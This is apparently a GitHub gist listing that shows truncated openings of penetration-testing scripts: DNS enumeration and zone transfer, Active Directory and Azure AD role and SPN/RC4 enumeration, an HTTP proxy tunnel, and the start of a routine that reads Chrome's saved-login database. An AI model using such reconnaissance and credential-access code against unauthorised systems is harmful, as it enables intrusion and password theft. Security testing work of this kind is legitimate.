This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
import sys | |
def run_dnsenum(wordlist, dns_server, domain_file): | |
with open(domain_file, 'r') as file: | |
domains = file.readlines() | |
for domain in domains: | |
domain = domain.strip() | |
command = [ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import dns.query | |
import dns.zone | |
import sys | |
def axfr_query(domain, nameserver): | |
try: | |
zone = dns.zone.from_xfr(dns.query.xfr(nameserver, domain)) | |
return zone | |
except Exception: | |
return None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
param( | |
[string]$filePath | |
) | |
Import-Module ActiveDirectory | |
Get-Content $filePath | ForEach-Object { | |
$groupName = $_ | |
Write-Host "`nGroup-Name $groupName" | |
Write-Host "----------------" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Import the Active Directory module | |
Import-Module ActiveDirectory | |
# Group name to search for | |
$groupName = "YourGroupName" | |
# Get the group | |
$group = Get-ADGroup -Filter { Name -eq $groupName } | |
if ($group -ne $null) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import paramiko | |
import socket | |
import select | |
def http_connect_tunnel(proxy_host, proxy_port, target_host, target_port): | |
""" | |
Establish an HTTP CONNECT tunnel through a proxy. | |
""" | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((proxy_host, proxy_port)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Import the Active Directory module | |
Import-Module ActiveDirectory | |
# Search for all AD objects with SPNs | |
$objectsWithSPN = Get-ADObject -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes | |
# Iterate through each object and check for RC4 encryption | |
foreach ($obj in $objectsWithSPN) { | |
$name = $obj.Name | |
$spns = $obj.ServicePrincipalName |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Import the Active Directory module | |
Import-Module ActiveDirectory | |
# Enumerate all user accounts with SPNs | |
$usersWithSPN = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes | |
# Iterate through each user and check for RC4 encryption | |
foreach ($user in $usersWithSPN) { | |
$userName = $user.SamAccountName | |
$spns = $user.ServicePrincipalName |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sqlite3 | |
import shutil | |
import os | |
import win32crypt | |
from importlib import import_module | |
def get_chrome_db_path(): | |
"""Determine the path of the Chrome history database based on the operating system.""" | |
if os.name == "nt": # Windows | |
return f"C:\\Users\\{os.getlogin()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data".format(os.getlogin()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Import the required module if not already imported | |
Import-Module AzureAD | |
# Login to Azure AD | |
Connect-AzureAD | |
# Get the 'Application Admin' role | |
$appAdminRole = Get-AzureADDirectoryRole | Where-Object {$_.displayName -eq 'Application Admin'} | |
# If the role hasn't been instantiated, instantiate it |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Install the AzureAD PowerShell module | |
Install-Module AzureAD# Authenticate to the tenant | |
$username = "username@domain.com" | |
$password = 'YourVeryStrongPassword' | |
$SecurePassword = ConvertTo-SecureString “$password” -AsPlainText -Force | |
$Credential = New-Object System.Management.Automation.PSCredential($username, $SecurePassword) | |
Connect-AzureAD -Credential $Credential# Build our users and roles object | |
$UserRoles = Get-AzureADDirectoryRole | ForEach-Object { | |
$Role = $_ |
NewerOlder